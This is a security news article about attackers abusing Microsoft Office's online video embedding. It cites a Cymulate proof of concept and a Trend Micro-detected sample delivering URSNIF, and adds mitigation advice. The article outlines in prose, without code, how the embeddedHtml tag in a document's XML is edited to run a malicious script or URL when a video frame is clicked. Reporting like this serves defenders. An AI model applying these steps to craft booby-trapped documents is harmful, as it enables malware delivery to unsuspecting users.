Security firm Trend Micro was able to detect what it calls an “in-the-wild sample” in Virus Total that delivers a malware that steals information. This is in response to Cymulate’s discovery of a proof of concept (PoC) that exploits logic and lets hackers “abuse the online video feature of Microsoft Office.”
Microsoft Office allows online video embedding from different websites within a document. When the online videos are modified as XML files, that is when PoC is exploited using a “logical bug.”
SaaS-based cyber-attack simulation company Cymulate explained how the attacks are executed. The initial step is modifying the document from DOCX to ZIP of Microsoft Office 2013 and later versions. Then the file extraction begins to locate the tag (embeddedHtml) within the XML file. Attackers will then attach the malicious scripts or URLs, where it automatically redirects the user to the specified URL after clicking anywhere on the video frame inside the document. When the script inside embeddedHtml has already been modified, that’s when the payload is deployed. It is only then that a version of the URSNIF malware when users access a malicious URL.
Trend Micro explained that the PoC launches an application for a file “to decode a base64-encoded binary embedded within the video tag. It is also triggered by clicking the video frame. Once decoded, it will prompt the user with Internet Explorer Download Manager with a notification asking whether to run or manually save the executable.”
The actual malware is said to be more effective because it is easy to use by accessing the malicious URL. The malicious script is anywhere within the file and when the user clicks an area in the video frame, it automatically downloads the finaly payload.
According to Trend Micro’s blog, Microsoft did not assign “a CVE identifier for this as the online video embedding feature is working as intended/designed.”
What can users do, Trend Micro said is block Word documents that contain embeddedHtml tag in XML files or just disable documents with embedded video.
“Given how this seemingly new technique only needs to modify URLs, it could expose users and businesses to various malware and other threats. Adopt best practices: be more cautious against unsolicited emails and update systems, applications, and networks to patch exploitable vulnerabilities. Employing security mechanisms that can provide additional layers of security to endpoints (such as URL filtering/categorization) can also help block malicious URLs and malware,”